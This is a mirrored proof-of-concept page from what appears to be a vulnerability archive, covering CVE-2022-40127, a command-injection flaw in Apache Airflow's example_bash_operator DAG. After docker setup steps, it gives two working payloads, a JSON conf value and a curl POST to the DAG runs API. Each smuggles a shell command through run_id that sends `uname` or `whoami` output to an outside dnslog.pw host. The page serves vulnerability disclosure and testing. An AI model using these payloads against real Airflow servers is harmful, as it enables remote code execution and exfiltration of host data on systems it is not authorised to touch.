关联漏洞
标题:
Apache Airflow 代码注入漏洞
(CVE-2022-40127)
描述:Apache Airflow是美国阿帕奇(Apache)基金会的一套用于创建、管理和监控工作流程的开源平台。该平台具有可扩展和动态监控等特点。 Apache Airflow存在代码注入漏洞,该漏洞源于其Example Dags允许具有UI访问权限的攻击者触发DAGs,通过手动提供run_id参数执行任意命令。
描述
Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC
介绍
# CVE-2022-40127
Apache Airflow < 2.4.0 DAG example_bash_operator RCE
# poc docker env:
```
mkdir CVE-2022-40127 && cd CVE-2022-40127
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
#or wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yaml
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up -d
#waiting some times
open localhost:8080
```
# POC 1
example_bash_operator
```
{"fxoxx":"\";curl `uname`.lxx2.535ld4zn.dnslog.pw;\""}
```
<img width="952" alt="image" src="https://user-images.githubusercontent.com/18260135/202715494-4ca2fd4f-384e-40aa-ae7b-02ca51defa4f.png">
## dnslog via
<img width="414" alt="image" src="https://user-images.githubusercontent.com/18260135/202846433-4a4a40fa-675e-477b-a9c4-be2f6c894583.png">
# POC 2
```
curl -X 'POST' \
'http://10.11.12.131:8080/api/v1/dags/example_bash_operator/dagRuns' \
-H 'accept: application/json' \
-H 'Content-Type: application/json' \
-d '{
"conf": {
"dag_run": "api2"
},
"dag_run_id": "id \"&& curl `whoami`.api222.535ld4zn.dnslog.pw",
"logical_date": "2022-11-19T10:13:13.920Z"
}'
```
http://localhost:8080/redoc#tag/DAGRun/operation/post_dag_run
<img width="1638" alt="image" src="https://user-images.githubusercontent.com/18260135/202846307-165943c3-dd8e-4d92-aae8-72516fc00f82.png">
http://localhost:8080/api/v1/ui/#/DAGRun/post_dag_run
<img width="1454" alt="image" src="https://user-images.githubusercontent.com/18260135/202846350-ca6d0770-8143-4da8-8ac5-1596f365cff9.png">
<img width="1453" alt="image" src="https://user-images.githubusercontent.com/18260135/202846365-e4d0b467-7e06-4112-899b-14245dc17b5f.png">
## dnslog via
<img width="408" alt="image" src="https://user-images.githubusercontent.com/18260135/202846417-9d359d5a-cc6f-4be2-8003-cfefd3d488f4.png">
commit:
https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a
links:
https://stackoverflow.com/questions/67110383/how-to-trigger-airflow-dag-with-rest-api-i-get-property-is-read-only-state
文件快照
[4.0K] /data/pocs/9d788aa651e4c1fe35a51b6fe04ec31c6b4a3763
├── [10.0K] docker-compose.yaml
└── [2.1K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。